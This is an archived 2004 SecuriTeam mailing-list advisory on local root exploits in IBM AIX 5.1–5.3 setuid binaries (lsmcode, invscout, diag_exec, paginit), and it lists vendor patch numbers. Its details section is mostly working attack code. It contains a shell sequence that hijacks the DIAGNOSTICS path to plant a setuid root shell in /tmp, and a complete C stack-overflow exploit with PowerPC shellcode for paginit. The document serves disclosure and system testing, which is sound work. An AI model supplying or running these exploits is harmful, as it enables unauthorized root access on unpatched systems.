[EXPL] AIX paginit, lsmcode and invscout Local Exploits

From: SecuriTeam (support_at_securiteam.com)
Date: 12/21/04

  • Next message: SecuriTeam: "[NT] PHP Input Validation Vulnerabilities (addslashes, Windows Only)" 
    To: list@securiteam.com
Date: 21 Dec 2004 18:12:22 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      AIX paginit, lsmcode and invscout Local Exploits
    ------------------------------------------------------------------------

    SUMMARY

    The following exploit codes can be used to test your system for the
    vulnerabilities in paginit, lsmcode and invscout that we partly reported
    about in our previous advisory:
    <http://www.securiteam.com/unixfocus/6O00N0AC0A.html> IBM AIX invscout
    Local Command Execution Vulnerability.

    DETAILS

    Vulnerable Systems:
     * IBM's AIX versions 5.1, 5.2 and 5.3

    Solution:
    The vendor has been contacted and has released the following patches:
    1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and
    IY64277(5.3).
    2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and
    IY64312(5.3).

    Diag vulnerability:
    There are (at least) 4 broken suid binaries.
    -r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode
    -r-sr-x--- 1 root system 2796 Jan 26 2003
    /usr/sbin/diag_exec
    -r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout
    -r-sr-xr-x 1 root system 511362 Apr 08 2004
    /usr/sbin/invscoutd

    All these binaries are exploited the same way: the path set in the
    $DIAGNOSTICS environment is used by these binaries to execute
    $DIAGNOSTICS/bin/Dctrl as root.

    Example:
    Executing the following gives a root shell:

    mkdirhier /tmp/aap/bin
    export DIAGNOSTICS=/tmp/aap
    cat > /tmp/aap/bin/Dctrl << EOF
    #!/bin/sh
    cp /bin/sh /tmp/.shh
    chown root:system /tmp/.shh
    chmod u+s /tmp/.shh
    EOF
    chmod a+x /tmp/aap/bin/Dctrl
    lsmcode
    /tmp/.shh

    Paginit vulnerability:
    The following setuid binary:
    -r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit

    Does not do a bounds check on the first commandline argument, which is
    supposed to be a username. If you feed paginit the proper data and hit
    enter, root priviledges are gained.

    Exploit:
    /* exploit for /usr/bin/paginit
       tested on: AIX 5.2

       if the exploit fails it's because the shellcode
       ends up at a different address. use dbx to check,
       and change RETADDR accordingly.

       cees-bart <ceesb@cs.ru.nl>
    */

    #define RETADDR 0x2ff22c90

    char shellcode[] =
    "\x7c\xa5\x2a\x79"
    "\x40\x82\xff\xfd"
    "\x7c\xa8\x02\xa6"
    "\x38\xe0\x11\x11"
    "\x39\x20\x48\x11"
    "\x7c\xc7\x48\x10"
    "\x38\x46\xc9\x05"
    "\x39\x25\x11\x11"
    "\x38\x69\xef\x17"
    "\x38\x87\xee\xef"
    "\x7c\xc9\x03\xa6"
    "\x4e\x80\x04\x20"
    "\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x00"
    ;

    char envlabel[] = "X=";

    void printint(char* buf, int x) {
      buf[0] = x >> 24;
      buf[1] = (x >> 16) & 0xff;
      buf[2] = (x >> 8) & 0xff;
      buf[3] = x & 0xff;
    }

    int main(int argc, char **argv) {
      char *env[3];
      char code[1000];
      char buf[8000];
      char *p, *i;
      int offset1 = 0;

      offset1 = 0; // atoi(argv[1]);
      
      memset(code, 'C', sizeof(code));
      memcpy(code, envlabel,sizeof(envlabel)-1);
      // landingzone
      for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
        printint(i, 0x7ca52a79);

      memcpy(code+sizeof(code)-sizeof(shellcode), shellcode,
    sizeof(shellcode)-1);
      code[sizeof(code)-1] = 0;
      
      env[0] = code;
      env[1] = 0;

      memset(buf, 'A', sizeof(buf));
      buf[sizeof(buf)-1] = 0;
      
      p = buf;
      p += 4114;
      printint(p,RETADDR); // try to hit the landingzone
      p += 72;
      printint(p, RETADDR); // any readable address (apparently not
    overwritten)

      execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ceesb@cs.ru.nl> cees-bart.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] PHP Input Validation Vulnerabilities (addslashes, Windows Only)"

    Relevant Pages